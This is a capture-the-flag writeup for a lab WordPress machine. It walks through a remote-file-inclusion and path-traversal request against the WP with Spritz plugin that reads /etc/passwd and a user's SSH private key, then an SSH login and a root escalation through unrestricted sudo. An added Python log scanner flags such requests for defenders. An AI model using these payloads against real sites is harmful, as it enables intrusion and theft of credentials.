172.31.1.8

Cybersec Labs CMS Writeup

Another WordPress site

Running WPScan, we find the /uploads directory

It has a screenshot showing an id_rsa file's location: /home/angel/.ssh/id_rsa

WPScan also shows the Twenty Twenty theme as vulnerable

but can't find anything

But there’s a plugin with RFI

WordPress Plugin WP with Spritz 1.0 – Remote File Inclusion

Proof of Concept

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

so going to

The output is not properly formatted, so we view the page source

We get the private key for user angel
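From the defender's side, requests like the proof of concept above stand out in the web server's access log. The following is an added example, not part of the original writeup or the plugin's code: it scans constructed log lines for requests to the plugin script whose url parameter carries a traversal sequence, an absolute path or a scheme. The log lines, the helper names and the choice to flag every such value are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path taken from the proof of concept on this page.
PLUGIN_SCRIPT = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

def fully_unquote(value, rounds=3):
    """Percent-decode a few extra times so double-encoded ../ is still seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(url_value):
    """Label a url= value: 'traversal', 'remote-url', 'local-path' or None."""
    v = fully_unquote(url_value).replace("\\", "/")
    if "../" in v or v.endswith(".."):
        return "traversal"
    if SCHEME_RE.match(v):
        return "remote-url"
    if v.startswith("/"):
        return "local-path"
    return None

def scan(lines):
    """Return (client_ip, status, label, decoded_value) per suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        parts = urlsplit(m["target"]) if m else None
        if not parts or fully_unquote(parts.path).lower() != PLUGIN_SCRIPT:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("url", []):
            label = classify(value)
            if label:
                hits.append((m["ip"], int(m["status"]), label, fully_unquote(value)))
    return hits

# Constructed sample lines in common log format (documentation-range addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2021:10:01:02 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [12/Mar/2021:10:01:09 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [12/Mar/2021:10:02:30 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http://203.0.113.50/exec HTTP/1.1" 200 512',
    '192.0.2.44 - - [12/Mar/2021:10:03:00 +0000] "GET /wp-content/uploads/2021/03/logo.png HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A 200 status on a flagged request means the script answered; whether file contents were returned still has to be confirmed from the response size or a packet capture.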

Log in via SSH

ssh -i id_rsa angel@172.31.1.8

Running sudo -l

User angel may run the following commands on cms:

    (ALL : ALL) NOPASSWD: ALL

So sudo su and we are root

root@cms:/home/angel# cat access.txt

d5ca58536a32935299d9f1026436f149

root@cms:~# cat system.txt

459daa8ee877e8048563ca65dc867afa

Author

Sentinal920